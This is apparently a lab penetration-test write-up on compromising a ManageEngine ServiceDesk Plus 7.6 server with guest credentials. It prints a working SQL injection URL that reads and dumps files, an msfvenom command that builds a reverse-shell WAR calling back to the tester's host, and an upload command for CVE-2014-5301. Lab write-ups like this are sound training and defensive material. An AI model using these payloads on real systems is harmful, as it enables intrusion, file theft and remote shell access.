Executive Summary
Helpdesk is a Windows 2008 Standard server which hosts ManageEngine ServiceDesk Plus (SDP) 7.6 web application, the ManageEngine SDP version suffers from multiple vulnerabilities, amongst multiple vulnerabilities we used two exploits.
- Sql injection – We are able to read proof.txt from C:\Users\Administrator\Desktop\
- Arbitrary file upload – We uploaded a malicious reverse shell java war file to gain access and got administrative privilege on Helpdesk.
the above two exploits were achieved with just a guest account.
Recommendation
It is recommended to patch ManageEngine ServiceDesk Plus to the latest version, disable guest account if not needed, if guest account is needed check with ManageEngine if change of username and password is viable.
Service Enumeration
| TCP | Description |
| 135 | MS RPC |
| 139 | netbios-ssn |
| 445 | MS SMB |
| 3389 | Remote Desktop |
| 8080 | ManageEngine ServiceDesk |
Vulnerability exploited
SQL injection
To perform the exploits we first logon to ManageEngine SDP as guest, the account name and the password are the same.
The original PoC can be reference at: https://www.exploit-db.com/exploits/11793
This is the modified PoC:
http://192.168.x.43:8080/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=6)union select 1,2,3,4,5,6,7,":",load_file("c:\\users\\administrator\\desktop\\proof.txt"),":",11,12,13,14,15,16,17,18,19,1 into dumpfile 'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\loot.txt'/*The PoC abuses MySQL query to write query result into a file – loot.txt, the query uses load_file function to read proof.txt and saves to loot.txt.
To view the content navigate to http://192.168.x.43:8080/images/loot.txt
SQL injection is possible because the woID is not properly sanitized.
Arbitrary File upload
The reference of the vulnerability can be found in CVE-2014-5301. The directory traversal vulnerability is exploited to upload any file a person wishes to.
The directory traversal can be traverse to the jboss path (../../server/default/deploy) which directly deploys and executes java war file, a post request is made to /common/FileAttachment.jsp then the war file is uploaded to the jboss path and executes.
An automated python script is available to exploit this vulnerability: https://raw.githubusercontent.com/PeterSufliarsky/exploits/master/CVE-2014-5301.py
First generate a malicious java war file with msfvenom:
msfvenom -p java/shell/reverse_tcp lhost=192.168.x.x lport=8080 -f war -o shell.warThis war file will send connection to a multi handler server which I set up.
Then run the python script to upload shell.war to Helpdesk.
./CVE-2014-5301.py 192.168.x.43 8080 guest guest shell.war
The ManageEngine SDP was started with administrative rights (NT authority\System) and hence I can easily navigate to C:\Users\Administrator\Desktop\proof.txt.
Obtain proof.txt
cyruslab 